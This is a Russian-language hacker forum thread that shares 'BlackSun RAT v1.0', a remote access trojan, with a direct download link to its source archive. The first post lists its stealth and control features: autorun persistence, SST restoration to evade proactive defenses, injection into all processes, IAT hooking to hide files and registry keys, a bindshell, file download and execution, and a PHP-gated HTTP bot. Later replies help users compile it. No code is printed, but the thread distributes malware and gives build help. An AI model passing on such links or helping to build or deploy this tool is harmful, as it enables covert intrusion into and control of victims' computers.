Форум АНТИЧАТ - BlackSun RAT v1.0 by Cytech

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)

- - BlackSun RAT v1.0 by Cytech (https://forum.antichat.xyz/showthread.php?t=41973)

BlackSun RAT v1.0 by Cytech

поздновато выкладываю, но всё же дабы было достоянием общественности:

Цитата:

BlackSun RAT v1.0 prebeta by Cytech
- продвинутая система удаленного администратирования. При запуске прописывается в автозагрузку и восстанавливает таблицу системных сервисов (SST) для обхода проактивных защит контролирующих process-injection. Затем инжектирует себя во все процессы и перехывает в них некоторые API-функции для сокрытия в системе методом модификации таблицы импорта (IAT-hooking). Работает в контексте заданного процесса (по дефолту explorer.exe). После чего слушает порт (по дефолту 2121) для подключений. Сервер поддерживает множество команд:
- Выполнение команд через cmd.exe
- Скрытый/видимый запуск через WinExec
- Скачка файла по HTTP-протоколу
- Закачка файла с компьютера на FTP-протокол
- Привзяка cmd.exe к заданному порту (bindshell)
- Управление питанием (выключить/перезагрузить/заснуть/встать)
- Самоуничтожение
- Завершение работы
- а также приблуды вроде открывания/закрывания CD-ROM, включения/выключения монитора и т.д. Встроен HTTP-бот, который отстукивает на статистику и получает команду на скачку и запуск заданного файла. Причем HTTP-бот работает полностью распределенно, то есть каждому боту можно выставить свою собственную команду.
Бэкдор управляется полностью через PHP-гейт. В итоге полностью невидимы файлы, ключи в реестре, процесс.
Подробнее внутри.

http://hellknights.void.ru/
http://hellknights.void.ru/releases/0x48k-blacksun-rcs-v10prebeta.rar

Давно их смотрел. Очень познавательно и интересно, НО не компилиться. Ругаеться на недостаток H файла.

Цитата:

Сообщение от Alexsize

Давно их смотрел. Очень познавательно и интересно, НО не компилиться. Ругаеться на недостаток H файла.

Какого именно хедера там не хватает? Если что я могу с Сайтексом сконтактировать, если сам не разберусь.

Error 1 fatal error C1010: unexpected end of file while looking for precompiled header. Did you forget to add '#include "stdafx.h"' to your source?

Цитата:

Сообщение от Alexsize

Error 1 fatal error C1010: unexpected end of file while looking for precompiled header. Did you forget to add '#include "stdafx.h"' to your source?

Скорее всего ты пытаешься собрать его в MSVC, что в корне неверно т.к. в readme автор совершенно чётко написал что собирать надо в компиляторе lcc. У меня собирается без проблем. lcc можно скачать здесь:
http://www.cs.virginia.edu/~lcc-win32/

Окей. Спасибо. Я действительно собирал у мелкомягких.

Вот выдержка из ридми кстати:

Сначало необходимо поправить конфигурационные файлы: conf.h (бэкдор) и conf.php (гейт).
Затем компилируем (у меня Microsoft (R) 32-bit C/C++ Standard Compiler Version 12.00.8168)

Цитата:

Сообщение от Alexsize

OK, так тоже можно.

Цитата:

Скорее всего ты пытаешься собрать его в Msvc, что в корне неверно

Особых различий в компиляторах нет. Разве что только какиенить заумные прагмы

Йа компилел в DevC++, Mars Digital compiler, lcc.... везде ошибки... везде разные... =((
По линку с компилеру, что дал ShadOS линк на компилер не нашёл =\ только хелп и что-то ещё...

Вот полный линк.
http://www.q-software-solutions.de/pub/lccwin32.exe